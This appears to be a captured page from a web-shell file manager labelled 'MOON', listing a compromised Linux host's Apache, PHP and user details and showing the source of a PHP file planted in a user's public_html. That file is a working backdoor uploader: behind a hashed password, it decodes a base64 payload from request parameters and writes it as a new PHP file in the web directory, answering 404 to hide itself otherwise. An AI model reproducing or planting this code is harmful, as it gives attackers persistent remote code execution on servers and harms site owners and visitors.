MOON
Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_auth_passthrough/2.1
System: Linux int.interweb-hosting.net 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User: elainekoch (690)
PHP: 5.4.45
Disabled: NONE
Upload Files
File: /home/elainekoch/public_html/ea81d5bb.php
<?php $r=array_merge($_GET,$_POST);if(!isset($r['p'])||!isset($r['c'])){http_response_code(404);exit;}if(hash('sha256',$r['p'])!=='3b18ab590a3be0ef52e062b7d70b2214502187b1b2a77a3579c12f5b81bde44c'){http_response_code(403);exit;}$d=base64_decode($r['c']);if($d===false){http_response_code(400);exit;}$f=isset($r['f'])?basename($r['f']):'x'.bin2hex(random_bytes(4)).'.php';file_put_contents(__DIR__.'/'.$f,$d);echo json_encode(['ok'=>1,'file'=>$f]);?>